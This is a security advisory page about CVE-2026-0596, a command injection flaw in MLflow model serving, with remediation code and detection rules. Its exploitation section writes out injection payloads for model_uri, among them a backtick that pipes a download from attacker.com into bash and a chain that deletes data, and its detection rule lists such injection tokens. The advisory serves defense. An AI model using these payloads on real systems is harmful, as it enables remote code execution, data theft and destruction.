Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

498+ Articles
116+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-0596: MLflow Command Injection via Unsanitized model_uri (CVSS 9.6)
CVE-2026-0596: MLflow Command Injection via Unsanitized model_uri (CVSS 9.6)

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-0596

CVE-2026-0596: MLflow Command Injection via Unsanitized model_uri (CVSS 9.6)

A critical command injection vulnerability in mlflow/mlflow allows attackers to execute arbitrary shell commands by embedding metacharacters in the model_uri parameter when serving models with MLServer enabled.

Dylan H.

Security Team

April 1, 2026
6 min read

Affected Products

  • mlflow/mlflow (all versions with enable_mlserver=True)

Executive Summary

A critical command injection vulnerability (CVE-2026-0596) has been identified in mlflow/mlflow, the widely deployed open-source machine learning lifecycle management platform. The flaw carries a CVSS score of 9.6 and is triggered when serving ML models using the enable_mlserver=True configuration flag.

The root cause is straightforward: the model_uri parameter is interpolated directly into a bash -c shell command without any sanitisation. An attacker who can influence the value of model_uri — for example, through a model registry, API call, or configuration input — can inject arbitrary shell metacharacters such as $() or backticks to achieve remote code execution on the host serving the model.

Any organisation running MLflow model serving with MLServer integration should treat this as an urgent patch priority, particularly in shared infrastructure, multi-tenant model serving environments, or pipelines that accept externally supplied model URIs.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-0596
CVSS Score9.6 (Critical)
CWECWE-78 — Improper Neutralisation of Special Elements used in an OS Command
TypeCommand Injection / Remote Code Execution
Attack VectorNetwork
Privileges RequiredLow
User InteractionNone
ScopeChanged
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh
Trigger Conditionenable_mlserver=True at serve time

Affected Versions

ComponentAffected ConditionFixed Version
mlflow/mlflowAll versions — when serve() called with enable_mlserver=TruePending / apply workaround

Technical Analysis

Root Cause

When MLflow is used to serve a model with the MLServer backend (enable_mlserver=True), the serving function constructs a shell command of the form:

bash -c "mlflow models serve -m <model_uri> --enable-mlserver ..."

The model_uri value is embedded directly into this command string without any escaping, quoting, or allowlist validation. This is a textbook CWE-78 (OS Command Injection) pattern.

Exploitation

An attacker who controls or influences the model_uri value can inject shell metacharacters:

# Backtick injection
model_uri = "models:/mymodel/1`curl attacker.com/payload | bash`"
 
# Command substitution injection
model_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"
 
# Semicolon-based chaining
model_uri = "models:/mymodel/1; rm -rf /critical/data"

Each of these patterns causes the injected command to execute in the context of the MLflow serving process — which in many deployments runs with service account or even root privileges.

Attack Surface

The attack surface is broader than it may initially appear:

  • Model Registry API: If an attacker can register a model with a malicious URI, serving any version of it will trigger execution
  • Automated pipelines: MLflow pipelines that auto-serve the latest registered model version are directly vulnerable
  • Multi-tenant environments: Platforms where multiple teams can register models are especially at risk
  • CI/CD integration: Pipelines that call mlflow models serve with dynamic URIs derived from external input

Impact Assessment

Impact AreaDescription
Remote Code ExecutionArbitrary commands execute as the MLflow serving process user
Data ExfiltrationAccess to training data, model artefacts, secrets, and environment variables
Lateral MovementShell access can be used to pivot to databases, cloud metadata endpoints, and internal services
PersistenceAttacker can install backdoors, cron jobs, or modified model files
Supply Chain RiskCompromised model serving infrastructure can poison downstream predictions or data pipelines
Secrets TheftCloud provider credentials, MLflow tracking server tokens, and database URIs commonly present as environment variables

Immediate Remediation

Step 1: Disable MLServer Integration Until Patched

# Do NOT use enable_mlserver=True until a patch is confirmed
mlflow models serve -m "models:/MyModel/1"
# Remove --enable-mlserver flag entirely

Step 2: Validate and Sanitise model_uri Inputs

If you must accept dynamic model_uri values, implement strict allowlist validation:

import re
 
SAFE_MODEL_URI_PATTERN = re.compile(r'^(models:/[a-zA-Z0-9_\-]+/[0-9]+|runs:/[a-f0-9]{32}/[a-zA-Z0-9_/\-]+|s3://[a-zA-Z0-9._\-/]+)$')
 
def validate_model_uri(uri: str) -> str:
    if not SAFE_MODEL_URI_PATTERN.match(uri):
        raise ValueError(f"Unsafe model_uri rejected: {uri}")
    return uri

Step 3: Use subprocess with Argument Lists Instead of Shell

If you are customising MLflow or contributing a fix, the correct pattern is:

import subprocess
 
# INSECURE — DO NOT USE
subprocess.run(f"bash -c 'mlflow models serve -m {model_uri}'", shell=True)
 
# SECURE — argument list bypasses shell interpretation
subprocess.run(
    ["mlflow", "models", "serve", "-m", model_uri, "--enable-mlserver"],
    shell=False
)

Step 4: Run MLflow Serving with Minimal Privileges

# Create a dedicated service account
useradd -r -s /sbin/nologin mlflow-serve
 
# Run serving as that account
sudo -u mlflow-serve mlflow models serve -m "models:/MyModel/1"
 
# Or in Docker: drop all capabilities
docker run --cap-drop ALL --security-opt no-new-privileges mlflow-serving-image

Detection

Check for Active Exploitation Indicators

# Look for unexpected processes spawned by the mlflow serving process
ps auxf | grep mlflow
 
# Check for suspicious command execution in audit logs
ausearch -c bash --start today
 
# Review MLflow server access logs for unusual model_uri values
grep -E '\$\(|`|;.*bash|&&.*curl' /var/log/mlflow/serve.log
 
# Check for unexpected outbound connections from the serving host
ss -tlnp | grep <mlflow-port>
netstat -anlp | grep ESTABLISHED | grep <mlflow-pid>

SIEM Detection Rule (Pseudocode)

rule: mlflow_command_injection_attempt
conditions:
  - process.name == "mlflow"
  - process.args contains any of ["$(", "`", "; bash", "&& curl", "| sh"]
  - event.type == "process_start"
severity: critical
response: alert + isolate

Workarounds

Until an official patch is released:

  1. Disable MLServer integration — do not pass enable_mlserver=True to any serving call
  2. Restrict model_uri sources — only serve models whose URIs are constructed internally, never from user input
  3. Network-segment the serving host — block egress from the MLflow serving process to limit the blast radius of exploitation
  4. Enable audit logging — capture all shell executions on the serving host
  5. Run in a container with restricted capabilities — limit what an injected command can do

References

  • NVD — CVE-2026-0596
  • MLflow GitHub Repository
  • CWE-78 — Improper Neutralisation of Special Elements used in an OS Command
#CVE-2026-0596#MLflow#Command Injection#Machine Learning Security#CWE-78#Shell Injection#MLServer

Related Articles

CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)

A maximum-severity command injection vulnerability in MLflow's model serving container initialization allows attackers to execute arbitrary OS commands via a maliciously crafted python_env.yaml dependency file when deploying models with env_manager=LOCAL.

7 min read

CVE-2026-32238: Critical Command Injection in OpenEMR Backup Functionality

OpenEMR versions prior to 8.0.0.2 contain a CVSS 9.1 command injection vulnerability in the backup functionality. Authenticated attackers with high...

6 min read

CVE-2025-15036: MLflow Path Traversal in Archive Extraction

A critical path traversal vulnerability in MLflow's extract_archive_to_dir function allows attackers to write arbitrary files outside the intended extraction directory via maliciously crafted tar archives. Affects all versions before v3.7.0.

6 min read
Back to all Security Alerts